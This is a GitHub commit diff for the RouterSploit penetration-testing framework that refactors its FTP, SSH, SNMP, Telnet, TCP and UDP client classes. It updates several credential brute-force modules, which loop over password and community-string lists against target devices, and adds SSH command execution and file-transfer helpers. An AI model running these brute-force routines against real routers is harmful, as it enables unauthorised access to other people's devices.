Unverified Commit c351256d by Marcin Bury Committed by GitHub

Unifying ftp/ssh/telnet/snmp communication (#505)

* Unifying communication api

* Adding error messages
parent 9aaa2ef0
import socket
import ftplib import ftplib
import io import io
...@@ -6,74 +5,87 @@ from routersploit.core.exploit.exploit import Exploit ...@@ -6,74 +5,87 @@ from routersploit.core.exploit.exploit import Exploit
from routersploit.core.exploit.exploit import Protocol from routersploit.core.exploit.exploit import Protocol
from routersploit.core.exploit.option import OptBool from routersploit.core.exploit.option import OptBool
from routersploit.core.exploit.printer import print_error from routersploit.core.exploit.printer import print_error
from routersploit.core.exploit.printer import print_success
FTP_TIMEOUT = 8.0 FTP_TIMEOUT = 8.0
class FTPClient(Exploit): class FTPCli(object):
""" FTP Client exploit """ """ FTP Client """
target_protocol = Protocol.FTP def __init__(self, ftp_target, ftp_port, ssl=False, verbosity=False):
self.ftp_target = ftp_target
self.ftp_port = ftp_port
self.verbosity = verbosity
ssl = OptBool(False, "SSL enabled: true/false") self.peer = "{}:{}".format(self.ftp_target, ftp_port)
verbosity = OptBool(True, "Enable verbose output: true/false")
def ftp_create(self): if ssl:
if self.ssl: self.ftp_client = ftplib.FTP_TLS()
ftp_client = ftplib.FTP_TLS()
else: else:
ftp_client = ftplib.FTP() self.ftp_client = ftplib.FTP()
return ftp_client
def ftp_connect(self, retries=1):
ftp_client = self.ftp_create()
def connect(self, retries=1):
for _ in range(retries): for _ in range(retries):
try: try:
ftp_client.connect(self.target, self.port, timeout=FTP_TIMEOUT) self.ftp_client.connect(self.ftp_target, self.ftp_port, timeout=FTP_TIMEOUT)
except (socket.error, socket.timeout): return self.ftp_client
print_error("Connection error", verbose=self.verbosity)
except Exception as err: except Exception as err:
print_error(err, verbose=self.verbosity) print_error(self.peer, "FTP Error while connecting to the server", err, verbose=self.verbosity)
else:
return ftp_client
ftp_client.close() self.ftp_client.close()
return None
def ftp_login(self, username, password): return None
ftp_client = self.ftp_connect()
if ftp_client:
try:
ftp_client.login(username, password)
return ftp_client
except Exception as err:
pass
ftp_client.close() def login(self, username, password):
try:
self.ftp_client.login(username, password)
print_success(self.peer, "FTP Authentication Successful - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
return self.ftp_client
except Exception as err:
print_error(self.peer, "FTP Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
self.ftp_client.close()
return None return None
def ftp_test_connect(self): def test_connect(self):
ftp_client = self.ftp_connect() if self.connect():
if ftp_client: self.ftp_client.close()
ftp_client.close()
return True return True
return False return False
def ftp_get_content(self, ftp_client, remote_file): def get_content(self, remote_file):
if ftp_client: try:
fp_content = io.BytesIO() fp_content = io.BytesIO()
ftp_client.retrbinary("RETR {}".format(remote_file), fp_content.write) self.ftp_client.retrbinary("RETR {}".format(remote_file), fp_content.write)
return fp_content.getvalue() return fp_content.getvalue()
except Exception as err:
print_error(self.peer, "FTP Error while retrieving content", err, verbose=self.verbosity)
return None return None
def ftp_close(self, ftp_client): def close(self):
if ftp_client: try:
ftp_client.close() self.ftp_client.close()
except Exception as err:
print_error(self.peer, "FTP Error while closing connection", err, verbose=self.verbosity)
return None return None
class FTPClient(Exploit):
""" FTP Client exploit option and api """
target_protocol = Protocol.FTP
ssl = OptBool(False, "SSL enabled: true/false")
verbosity = OptBool(True, "Enable verbose output: true/false")
def ftp_create(self, target=None, port=None):
ftp_target = target if target else self.target
ftp_port = port if port else self.port
ftp_client = FTPCli(ftp_target, ftp_port, ssl=self.ssl, verbosity=self.verbosity)
return ftp_client
...@@ -10,29 +10,48 @@ from routersploit.core.exploit.printer import print_error ...@@ -10,29 +10,48 @@ from routersploit.core.exploit.printer import print_error
SNMP_TIMEOUT = 15.0 SNMP_TIMEOUT = 15.0
class SNMPClient(Exploit): class SNMPCli(object):
""" SNMP Client exploit """ """ SNMP Client """
target_protocol = Protocol.SNMP def __init__(self, snmp_target, snmp_port, verbosity=False):
self.snmp_target = snmp_target
self.snmp_port = snmp_port
self.verbosity = verbosity
verbosity = OptBool(True, "Enable verbose output: true/false") self.peer = "{}:{}".format(self.snmp_target, snmp_port)
def snmp_get(self, community_string, oid, version=1, retries=0): def get(self, community_string, oid, version=1, retries=0):
cmdGen = cmdgen.CommandGenerator() cmdGen = cmdgen.CommandGenerator()
try: try:
errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd( errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd(
cmdgen.CommunityData(community_string, mpModel=version), cmdgen.CommunityData(community_string, mpModel=version),
cmdgen.UdpTransportTarget((self.target, self.port), timeout=SNMP_TIMEOUT, retries=retries), cmdgen.UdpTransportTarget((self.snmp_target, self.snmp_port), timeout=SNMP_TIMEOUT, retries=retries),
oid, oid,
) )
except Exception: except Exception as err:
print_error(self.peer, "SNMP Error while accessing server", err, verbose=self.verbosity)
return None return None
if errorIndication or errorStatus: if errorIndication or errorStatus:
print_error("SNMP invalid community string: '{}'".format(community_string), verbose=self.verbosity) print_error(self.peer, "SNMP invalid community string: '{}'".format(community_string), verbose=self.verbosity)
else: else:
print_success("SNMP valid community string found: '{}'".format(community_string), verbose=self.verbosity) print_success(self.peer, "SNMP valid community string found: '{}'".format(community_string), verbose=self.verbosity)
return varBinds return varBinds
return None return None
class SNMPClient(Exploit):
""" SNMP Client exploit """
target_protocol = Protocol.SNMP
verbosity = OptBool(True, "Enable verbose output: true/false")
def snmp_create(self, target=None, port=None):
snmp_target = target if target else self.target
snmp_port = port if port else self.port
snmp_client = SNMPCli(snmp_target, snmp_port, verbosity=self.verbosity)
return snmp_client
...@@ -17,42 +17,36 @@ from routersploit.core.exploit.utils import random_text ...@@ -17,42 +17,36 @@ from routersploit.core.exploit.utils import random_text
SSH_TIMEOUT = 8.0 SSH_TIMEOUT = 8.0
class SSHClient(Exploit): class SSHCli(object):
""" SSH Client exploit """ def __init__(self, ssh_target, ssh_port, verbosity):
self.ssh_target = ssh_target
target_protocol = Protocol.SSH self.ssh_port = ssh_port
self.verbosity = verbosity
verbosity = OptBool(True, "Enable verbose output: true/false")
def ssh_create(self): self.peer = "{}:{}".format(self.ssh_target, self.ssh_port)
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
return ssh_client self.ssh_client = paramiko.SSHClient()
self.ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def ssh_login(self, username, password, retries=1):
ssh_client = self.ssh_create()
def login(self, username, password, retries=1):
for _ in range(retries): for _ in range(retries):
try: try:
ssh_client.connect(self.target, self.port, timeout=SSH_TIMEOUT, banner_timeout=SSH_TIMEOUT, username=username, password=password, look_for_keys=False) self.ssh_client.connect(self.ssh_target, self.ssh_port, timeout=SSH_TIMEOUT, banner_timeout=SSH_TIMEOUT, username=username, password=password, look_for_keys=False)
except paramiko.AuthenticationException: except paramiko.AuthenticationException:
print_error("SSH Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) print_error(self.peer, "SSH Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
ssh_client.close() self.ssh_client.close()
break break
except Exception as err: except Exception as err:
print_error("Err: {}".format(err), verbose=self.verbosity) print_error(self.peer, "SSH Error while authenticating", err, verbose=self.verbosity)
else: else:
print_success("SSH Authentication Successful - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) print_success(self.peer, "SSH Authentication Successful - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
return ssh_client return self.ssh_client
ssh_client.close()
return self.ssh_client.close()
def ssh_login_pkey(self, username, priv_key, retries=1): return None
ssh_client = self.ssh_create()
def login_pkey(self, username, priv_key, retries=1):
if "DSA PRIVATE KEY" in priv_key: if "DSA PRIVATE KEY" in priv_key:
priv_key = paramiko.DSSKey.from_private_key(io.StringIO(priv_key)) priv_key = paramiko.DSSKey.from_private_key(io.StringIO(priv_key))
elif "RSA PRIVATE KEY" in priv_key: elif "RSA PRIVATE KEY" in priv_key:
...@@ -62,70 +56,86 @@ class SSHClient(Exploit): ...@@ -62,70 +56,86 @@ class SSHClient(Exploit):
for _ in range(retries): for _ in range(retries):
try: try:
ssh_client.connect(self.target, self.port, timeout=SSH_TIMEOUT, banner_timeout=SSH_TIMEOUT, username=username, pkey=priv_key, look_for_keys=False) self.ssh_client.connect(self.ssh_target, self.ssh_port, timeout=SSH_TIMEOUT, banner_timeout=SSH_TIMEOUT, username=username, pkey=priv_key, look_for_keys=False)
except paramiko.AuthenticationException: except paramiko.AuthenticationException:
print_error("Authentication Failed - Username: '{}' auth with private key".format(username), verbose=self.verbosity) print_error(self.peer, "SSH Authentication Failed - Username: '{}' auth with private key".format(username), verbose=self.verbosity)
except Exception as err: except Exception as err:
print_error("Err: {}".format(err), verbose=self.verbosity) print_error(self.peer, "SSH Error while authenticated by using private key", err, verbose=self.verbosity)
else: else:
print_success("SSH Authentication Successful - Username: '{}' with private key".format(username), verbose=self.verbosity) print_success(self.peer, "SSH Authentication Successful - Username: '{}' with private key".format(username), verbose=self.verbosity)
return ssh_client return self.ssh_client
ssh_client.close() self.ssh_client.close()
return None return None
def ssh_test_connect(self): def test_connect(self):
ssh_client = self.ssh_create()
try: try:
ssh_client.connect(self.target, self.port, timeout=SSH_TIMEOUT, username="root", password=random_text(12), look_for_keys=False) self.ssh_client.connect(self.ssh_target, self.ssh_port, timeout=SSH_TIMEOUT, username="root", password=random_text(12), look_for_keys=False)
except paramiko.AuthenticationException: except paramiko.AuthenticationException:
ssh_client.close() self.ssh_client.close()
return True return True
except Exception as err:
print_error(self.peer, "SSH Error while testing connection", err, verbose=self.verbosity)
except socket.error: self.ssh_client.close()
print_error("Connection error", verbose=self.verbosity) return False
ssh_client.close()
return False
def execute(self, cmd):
try:
ssh_stdin, ssh_stdout, ssh_stderr = self.ssh_client.exec_command(cmd)
return ssh_stdout.read()
except Exception as err: except Exception as err:
print_error("Err: {}".format(err), verbose=self.verbosity) print_error(self.peer, "SSH Error while executing command on the server", err, verbose=self.verbosity)
ssh_client.close() return None
return False
def get_file(self, remote_file, local_file):
try:
sftp = self.ssh_client.open_sftp()
sftp.get(remote_file, local_file)
except Exception as err:
print_error(self.peer, "SSH Error while retrieving file from the server", err, verbose=self.verbosity)
return None
def get_content(self, remote_file):
try:
fp_content = io.BytesIO()
sftp = self.ssh_client.open_sftp()
sftp.getfo(remote_file, fp_content)
def ssh_execute(self, ssh, cmd): return fp_content.getvalue()
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd) except Exception as err:
return ssh_stdout.read() print_error(self.peer, "SSH Error while retrieving file content from the server", err, verbose=self.verbosity)
def ssh_get_file(self, ssh, remote_file, local_file): return None
sftp = ssh.open_sftp()
sftp.get(remote_file, local_file)
def ssh_get_content(self, ssh, remote_file): def send_file(self, local_file, dest_file):
fp_content = io.BytesIO() try:
sftp = ssh.open_sftp() sftp = self.ssh_client.open_sftp()
sftp.getfo(remote_file, fp_content) sftp.put(local_file, dest_file)
except Exception as err:
print_error(self.peer, "SSH Error while sending file to the server", err, verbose=self.verbosity)
return fp_content.getvalue() return None
def ssh_send_file(self, ssh, local_file, dest_file): def send_content(self, content, dest_file):
sftp = ssh.open_sftp() try:
sftp.put(local_file, dest_file) fp_content = io.BytesIO(content)
sftp = self.ssh_client.open_sftp()
sftp.putfo(fp_content, dest_file)
except Exception as err:
print_error(self.peer, "SSH Error while sending content to the server", err, verbose=self.verbosity)
def ssh_send_content(self, ssh, content, dest_file): return None
fp_content = io.BytesIO(content)
sftp = ssh.open_sftp()
sftp.putfo(fp_content, dest_file)
def ssh_interactive(self, ssh): def interactive(self):
if ssh: chan = self.ssh_client.invoke_shell()
chan = ssh.invoke_shell() if os.name == "posix":
if os.name == "posix": self._posix_shell(chan)
self._posix_shell(chan) else:
else: self._windows_shell(chan)
self._windows_shell(chan)
def _posix_shell(self, chan): def _posix_shell(self, chan):
import termios import termios
...@@ -182,10 +192,27 @@ class SSHClient(Exploit): ...@@ -182,10 +192,27 @@ class SSHClient(Exploit):
chan.send(d) chan.send(d)
except Exception as err: except Exception as err:
print_error("Err: {}".format(err), verbose=self.verbosity) print_error("Error", err, verbose=self.verbosity)
def ssh_close(self, ssh_client): def close(self):
if ssh_client: try:
ssh_client.close() self.ssh_client.close()
except Exception as err:
print_error(self.peer, "SSH Error while closing connection", verbose=self.verbosity)
return None return None
class SSHClient(Exploit):
""" SSH Client exploit """
target_protocol = Protocol.SSH
verbosity = OptBool(True, "Enable verbose output: true/false")
def ssh_create(self, target=None, port=None):
ssh_target = target if target else self.target
ssh_port = port if port else self.port
ssh_client = SSHCli(ssh_target, ssh_port, verbosity=self.verbosity)
return ssh_client
...@@ -12,84 +12,90 @@ from routersploit.core.exploit.utils import is_ipv6 ...@@ -12,84 +12,90 @@ from routersploit.core.exploit.utils import is_ipv6
TCP_SOCKET_TIMEOUT = 8.0 TCP_SOCKET_TIMEOUT = 8.0
class TCPClient(Exploit): class TCPCli(object):
""" TCP Client exploit """ def __init__(self, tcp_target, tcp_port, verbosity=False):
self.tcp_target = tcp_target
target_protocol = Protocol.TCP self.tcp_port = tcp_port
self.verbosity = verbosity
verbosity = OptBool(True, "Enable verbose output: true/false")
self.peer = "{}:{}".format(self.tcp_target, self.tcp_port)
def tcp_create(self):
if is_ipv4(self.target): if is_ipv4(self.tcp_target):
tcp_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.tcp_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
elif is_ipv6(self.target): elif is_ipv6(self.tcp_target):
tcp_client = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) self.tcp_client = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else: else:
print_error("Target address is not valid IPv4 nor IPv6 address", verbose=self.verbosity) print_error("Target address is not valid IPv4 nor IPv6 address", verbose=self.verbosity)
return None return None
tcp_client.settimeout(TCP_SOCKET_TIMEOUT) self.tcp_client.settimeout(TCP_SOCKET_TIMEOUT)
return tcp_client
def tcp_connect(self): def connect(self):
try: try:
tcp_client = self.tcp_create() self.tcp_client.connect((self.tcp_target, self.tcp_port))
tcp_client.connect((self.target, self.port)) print_status(self.peer, "TCP Connection established", verbose=self.verbosity)
return self.tcp_client
print_status("Connection established", verbose=self.verbosity)
return tcp_client
except Exception as err: except Exception as err:
print_error("Could not connect", verbose=self.verbosity) print_error(self.peer, "TCP Error while connecting to the server", err, verbose=self.verbosity)
print_error(err, verbose=self.verbosity)
return None return None
def tcp_send(self, tcp_client, data): def send(self, data):
if tcp_client: try:
if type(data) is bytes: return self.tcp_client.send(data)
return tcp_client.send(data) except Exception as err:
else: print_error(self.peer, "TCP Error while sending data", err, verbose=self.verbosity)
print_error("Data to send is not type of bytes", verbose=self.verbosity)
return None return None
def tcp_recv(self, tcp_client, num): def recv(self, num):
if tcp_client: try:
try: response = self.tcp_client.recv(num)
response = tcp_client.recv(num) return response
return response except Exception as err:
except socket.timeout: print_error(self.peer, "TCP Error while receiving data", err, verbose=self.verbosity)
print_error("Socket did timeout", verbose=self.verbosity)
except socket.error:
print_error("Socket error", verbose=self.verbosity)
return None return None
def tcp_recv_all(self, tcp_client, num): def recv_all(self, num):
if tcp_client: try:
try: response = b""
response = b"" received = 0
received = 0 while received < num:
while received < num: tmp = self.tcp_client.recv(num - received)
tmp = tcp_client.recv(num - received)
if tmp:
if tmp: received += len(tmp)
received += len(tmp) response += tmp
response += tmp else:
else: break
break
return response
return response except Exception as err:
except socket.timeout: print_error(self.peer, "TCP Error while receiving all data", err, verbose=self.verbosity)
print_error("Socket did timeout", verbose=self.verbosity)
except socket.error:
print_error("Socket error", verbose=self.verbosity)
return None return None
def tcp_close(self, tcp_client): def close(self):
if tcp_client: try:
tcp_client.close() self.tcp_client.close()
except Exception as err:
print_error(self.peer, "TCP Error while closing tcp socket", err, verbose=self.verbosity)
return None return None
class TCPClient(Exploit):
""" TCP Client exploit """
target_protocol = Protocol.TCP
verbosity = OptBool(True, "Enable verbose output: true/false")
def tcp_create(self, target=None, port=None):
tcp_target = target if target else self.target
tcp_port = port if port else self.port
tcp_client = TCPCli(tcp_target, tcp_port, verbosity=self.verbosity)
return tcp_client
...@@ -10,102 +10,101 @@ from routersploit.core.exploit.printer import print_error ...@@ -10,102 +10,101 @@ from routersploit.core.exploit.printer import print_error
TELNET_TIMEOUT = 30.0 TELNET_TIMEOUT = 30.0
class TelnetClient(Exploit): class TelnetCli(object):
""" Telnet Client exploit """ def __init__(self, telnet_target, telnet_port, verbosity=False):
self.telnet_target = telnet_target
target_protocol = Protocol.TELNET self.telnet_port = telnet_port
self.verbosity = verbosity
verbosity = OptBool(True, "Enable verbose output: true/false") self.peer = "{}:{}".format(self.telnet_target, self.telnet_port)
def telnet_connect(self, target=None, port=None): self.telnet_client = None
if not target:
target = self.target
if not port:
port = self.port
def connect(self):
try: try:
telnet_client = telnetlib.Telnet(target, port, timeout=TELNET_TIMEOUT) self.telnet_client = telnetlib.Telnet(self.telnet_target, self.telnet_port, timeout=TELNET_TIMEOUT)
return telnet_client return self.telnet_client
except Exception: except Exception as err:
pass print_error(self.peer, "Telnet Error while connecting to the server", err, verbose=self.verbosity)
return None return None
def telnet_login(self, username, password, target=None, port=None, retries=1): def login(self, username, password, retries=1):
if not target:
target = self.target
if not port:
port = self.port
for _ in range(retries): for _ in range(retries):
try: try:
telnet_client = self.telnet_connect(target=target, port=port) if not self.connect():
if not telnet_client:
continue continue
telnet_client.expect([b"Login: ", b"login: ", b"Username: ", b"username: "], 5) self.telnet_client.expect([b"Login: ", b"login: ", b"Username: ", b"username: "], 5)
telnet_client.write(bytes(username, "utf-8") + b"\r\n") self.telnet_client.write(bytes(username, "utf-8") + b"\r\n")
telnet_client.expect([b"Password: ", b"password: "], 5) self.telnet_client.expect([b"Password: ", b"password: "], 5)
telnet_client.write(bytes(password, "utf-8") + b"\r\n") self.telnet_client.write(bytes(password, "utf-8") + b"\r\n")
telnet_client.write(b"\r\n") self.telnet_client.write(b"\r\n")
(i, obj, res) = telnet_client.expect([b"Incorrect", b"incorrect"], 5) (i, obj, res) = self.telnet_client.expect([b"Incorrect", b"incorrect"], 5)
if i == -1 and any([x in res for x in [b"#", b"$", b">"]]) or len(res) > 500: # big banner e.g. mikrotik if i == -1 and any([x in res for x in [b"#", b"$", b">"]]) or len(res) > 500: # big banner e.g. mikrotik
print_success("Telnet Authentication Successful - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) print_success(self.peer, "Telnet Authentication Successful - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
return telnet_client return self.telnet_client
else: else:
print_error("Telnet Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) print_error(self.peer, "Telnet Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
break break
except EOFError:
print_error("Telnet connection error", verbose=self.verbosity)
except Exception as err: except Exception as err:
print_error(err, verbose=self.verbosity) print_error(self.peer, "Telnet Error while authenticating to the server", err, verbose=self.verbosity)
return None return None
def telnet_test_connect(self): def test_connect(self):
try: try:
telnet_client = telnetlib.Telnet(self.target, self.port, timeout=TELNET_TIMEOUT) self.telnet_client = telnetlib.Telnet(self.telnet_target, self.telnet_port, timeout=TELNET_TIMEOUT)
telnet_client.expect([b"Login: ", b"login: ", b"Username: ", b"username: "], 5) self.telnet_client.expect([b"Login: ", b"login: ", b"Username: ", b"username: "], 5)
telnet_client.close() self.telnet_client.close()
return True return True
except Exception: except Exception as err:
pass print_error(self.peer, "Telnet Error while testing connection to the server", err, verbose=self.verbosity)
return False return False
def telnet_interactive(self, telnet): def interactive(self):
telnet.interact() self.telnet_client.interact()
def telnet_read_until(self, telnet_client, data): def read_until(self, data):
if telnet_client: try:
try: response = self.telnet_client.read_until(data, 5)
if type(data) is str: return response
data = bytes(data, "utf-8") except Exception as err:
print_error(self.peer, "Telnet Error while reading data from the server", err, verbose=self.verbosity)
response = telnet_client.read_until(data, 5)
return str(response, "utf-8")
except Exception:
pass
return None return None
def telnet_write(self, telnet_client, data): def write(self, data):
if telnet_client: try:
try: return self.telnet_client.write(data, 5)
if type(data) is str: except Exception as err:
data = bytes(data, "utf-8") print_error(self.peer, "Telnet Error while writing to the server", err, verbose=self.verbosity)
return telnet_client.write(data, 5)
except Exception:
pass
return None return None
def telnet_close(self, telnet_client): def close(self):
if telnet_client: try:
telnet_client.close() self.telnet_client.close()
except Exception as err:
print_error(self.peer, "Telnet Error while closing connection", err, verbose=self.verbosity)
return None return None
class TelnetClient(Exploit):
""" Telnet Client exploit """
target_protocol = Protocol.TELNET
verbosity = OptBool(True, "Enable verbose output: true/false")
def telnet_create(self, target=None, port=None):
telnet_target = target if target else self.target
telnet_port = port if port else self.port
telnet_client = TelnetCli(telnet_target, telnet_port, verbosity=self.verbosity)
return telnet_client
...@@ -11,51 +11,60 @@ from routersploit.core.exploit.utils import is_ipv6 ...@@ -11,51 +11,60 @@ from routersploit.core.exploit.utils import is_ipv6
UDP_SOCKET_TIMEOUT = 8.0 UDP_SOCKET_TIMEOUT = 8.0
class UDPClient(Exploit): class UDPCli(object):
""" UDP Client exploit """ def __init__(self, udp_target, udp_port, verbosity=False):
self.udp_target = udp_target
self.udp_port = udp_port
self.verbosity = verbosity
target_protocol = Protocol.UDP self.peer = "{}:{}".format(self.udp_target, self.udp_port)
verbosity = OptBool(True, "Enable verbose output: true/false")
def udp_create(self): if is_ipv4(self.udp_target):
if is_ipv4(self.target): self.udp_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) elif is_ipv6(self.udp_target):
elif is_ipv6(self.target): self.udp_client = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
udp_client = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
else: else:
print_error("Target address is not valid IPv4 nor IPv6 address", verbose=self.verbosity) print_error("Target address is not valid IPv4 nor IPv6 address", verbose=self.verbosity)
return None return None
udp_client.settimeout(UDP_SOCKET_TIMEOUT) self.udp_client.settimeout(UDP_SOCKET_TIMEOUT)
return udp_client
def udp_send(self, udp_client, data): def send(self, data):
if udp_client: try:
if type(data) is bytes: return self.udp_client.sendto(data, (self.udp_target, self.udp_port))
try: except Exception as err:
return udp_client.sendto(data, (self.target, self.port)) print_error(self.peer, "Error while sending data", err, verbose=self.verbosity)
except Exception:
print_error("Exception while sending data", verbose=self.verbosity)
else:
print_error("Data to send is not type of bytes", verbose=self.verbosity)
return None return None
def udp_recv(self, udp_client, num): def recv(self, num):
if udp_client: try:
try: response = self.udp_client.recv(num)
response = udp_client.recv(num) return response
return response except Exception as err:
except socket.timeout: print_error(self.peer, "Error while receiving data", err, verbose=self.verbosity)
print_error("Socket did timeout", verbose=self.verbosity)
except socket.error:
print_error("Socket err", verbose=self.verbosity)
return None return None
def udp_close(self, udp_client): def close(self):
if udp_client: try:
udp_client.close() self.udp_client.close()
except Exception as err:
print_error(self.peer, "Error while closing udp socket", err, verbose=self.verbosity)
return None return None
class UDPClient(Exploit):
""" UDP Client exploit """
target_protocol = Protocol.UDP
verbosity = OptBool(True, "Enable verbose output: true/false")
def udp_create(self, target=None, port=None):
udp_target = target if target else self.target
udp_port = port if port else self.port
udp_client = UDPCli(udp_target, udp_port, verbosity=self.verbosity)
return udp_client
...@@ -55,27 +55,22 @@ class Exploit(FTPClient): ...@@ -55,27 +55,22 @@ class Exploit(FTPClient):
except StopIteration: except StopIteration:
break break
else: else:
ftp = self.ftp_connect(retries=3) ftp_client = self.ftp_create()
if ftp is None: if ftp_client.connect(retries=3) is None:
print_error("Too many connections problems. Quiting...", verbose=self.verbosity) print_error("Too many connections problems. Quiting...", verbose=self.verbosity)
return return
try: if ftp_client.login(username, password):
ftp.login(username, password)
if self.stop_on_success: if self.stop_on_success:
running.clear() running.clear()
print_success("Authenticated Succeed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
self.credentials.append((self.target, self.port, self.target_protocol, username, password)) self.credentials.append((self.target, self.port, self.target_protocol, username, password))
except Exception as err: ftp_client.close()
print_error("Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
ftp.close()
def check(self): def check(self):
if self.ftp_test_connect(): ftp_client = self.ftp_create()
if ftp_client.test_connect():
print_status("Target exposes FTP service", verbose=self.verbosity) print_status("Target exposes FTP service", verbose=self.verbosity)
return True return True
......
...@@ -53,27 +53,22 @@ class Exploit(FTPClient): ...@@ -53,27 +53,22 @@ class Exploit(FTPClient):
except StopIteration: except StopIteration:
break break
else: else:
ftp = self.ftp_connect(retries=3) ftp_client = self.ftp_create()
if ftp is None: if ftp_client.connect(retries=3) is None:
print_error("Too many connections problems. Quiting...", verbose=self.verbosity) print_error("Too many connections problems. Quiting...", verbose=self.verbosity)
return return
try: if ftp_client.login(username, password):
ftp.login(username, password)
if self.stop_on_success: if self.stop_on_success:
running.clear() running.clear()
print_success("Authenticated Succeed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
self.credentials.append((self.target, self.port, self.target_protocol, username, password)) self.credentials.append((self.target, self.port, self.target_protocol, username, password))
except Exception as err: ftp_client.close()
print_error("Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
ftp.close()
def check(self): def check(self):
if self.ftp_test_connect(): ftp_client = self.ftp_create()
if ftp_client.test_connect():
print_status("Target exposes FTP service", verbose=self.verbosity) print_status("Target exposes FTP service", verbose=self.verbosity)
return True return True
......
...@@ -50,7 +50,8 @@ class Exploit(SNMPClient): ...@@ -50,7 +50,8 @@ class Exploit(SNMPClient):
try: try:
community_string = data.next() community_string = data.next()
if self.snmp_get(community_string, "1.3.6.1.2.1.1.1.0", version=self.version): snmp_client = self.snmp_create()
if snmp_client.get(community_string, "1.3.6.1.2.1.1.1.0", version=self.version):
if self.stop_on_success: if self.stop_on_success:
running.clear() running.clear()
......
...@@ -53,19 +53,20 @@ class Exploit(SSHClient): ...@@ -53,19 +53,20 @@ class Exploit(SSHClient):
while running.is_set(): while running.is_set():
try: try:
username, password = data.next() username, password = data.next()
ssh = self.ssh_login(username, password) ssh_client = self.ssh_create()
if ssh: if ssh_client.login(username, password):
if self.stop_on_success: if self.stop_on_success:
running.clear() running.clear()
self.credentials.append((self.target, self.port, self.target_protocol, username, password)) self.credentials.append((self.target, self.port, self.target_protocol, username, password))
ssh.close() ssh_client.close()
except StopIteration: except StopIteration:
break break
def check(self): def check(self):
if self.ssh_test_connect(): ssh_client = self.ssh_create()
if ssh_client.test_connect():
print_status("Target exposes SSH service", verbose=self.verbosity) print_status("Target exposes SSH service", verbose=self.verbosity)
return True return True
......
...@@ -51,19 +51,20 @@ class Exploit(SSHClient): ...@@ -51,19 +51,20 @@ class Exploit(SSHClient):
while running.is_set(): while running.is_set():
try: try:
username, password = data.next().split(":") username, password = data.next().split(":")
ssh = self.ssh_login(username, password) ssh_client = self.ssh_create()
if ssh: if ssh_client.login(username, password):
if self.stop_on_success: if self.stop_on_success:
running.clear() running.clear()
self.credentials.append((self.target, self.port, self.target_protocol, username, password)) self.credentials.append((self.target, self.port, self.target_protocol, username, password))
ssh.close() ssh_client.close()
except StopIteration: except StopIteration:
break break
def check(self): def check(self):
if self.ssh_test_connect(): ssh_client = self.ssh_create()
if ssh_client.test_connect():
print_status("Target exposes SSH service", verbose=self.verbosity) print_status("Target exposes SSH service", verbose=self.verbosity)
return True return True
......
...@@ -53,19 +53,20 @@ class Exploit(TelnetClient): ...@@ -53,19 +53,20 @@ class Exploit(TelnetClient):
while running.is_set(): while running.is_set():
try: try:
username, password = data.next() username, password = data.next()
telnet = self.telnet_login(username, password, retries=3) telnet_client = self.telnet_create()
if telnet: if telnet_client.login(username, password, retries=3):
if self.stop_on_success: if self.stop_on_success:
running.clear() running.clear()
self.credentials.append((self.target, self.port, self.target_protocol, username, password)) self.credentials.append((self.target, self.port, self.target_protocol, username, password))
telnet.close() telnet_client.close()
except StopIteration: except StopIteration:
break break
def check(self): def check(self):
if self.telnet_test_connect(): telnet_client = self.telnet_create()
if telnet_client.test_connect():
print_status("Target exposes Telnet service", verbose=self.verbosity) print_status("Target exposes Telnet service", verbose=self.verbosity)
return True return True
......
...@@ -51,19 +51,20 @@ class Exploit(TelnetClient): ...@@ -51,19 +51,20 @@ class Exploit(TelnetClient):
while running.is_set(): while running.is_set():
try: try:
username, password = data.next().split(":") username, password = data.next().split(":")
telnet = self.telnet_login(username, password, retries=3) telnet_client = self.telnet_create()
if telnet: if telnet_client.login(username, password, retries=3):
if self.stop_on_success: if self.stop_on_success:
running.clear() running.clear()
self.credentials.append((self.target, self.port, self.target_protocol, username, password)) self.credentials.append((self.target, self.port, self.target_protocol, username, password))
telnet.close() telnet_client.close()
except StopIteration: except StopIteration:
break break
def check(self): def check(self):
if self.telnet_test_connect(): telnet_client = self.telnet_create()
if telnet_client.test_connect():
print_status("Target exposes Telnet service", verbose=self.verbosity) print_status("Target exposes Telnet service", verbose=self.verbosity)
return True return True
......
...@@ -49,8 +49,9 @@ class Exploit(TCPClient): ...@@ -49,8 +49,9 @@ class Exploit(TCPClient):
try: try:
username, password = creds.next().split(":") username, password = creds.next().split(":")
tcp_client = self.tcp_connect() tcp_client = self.tcp_create()
apiros = ApiRosClient(tcp_client) tcp_sock = tcp_client.connect()
apiros = ApiRosClient(tcp_sock)
output = apiros.login(username, password) output = apiros.login(username, password)
...@@ -69,9 +70,9 @@ class Exploit(TCPClient): ...@@ -69,9 +70,9 @@ class Exploit(TCPClient):
break break
def check(self): def check(self):
tcp_client = self.tcp_connect() tcp_client = self.tcp_create()
if tcp_client: if tcp_client.connect():
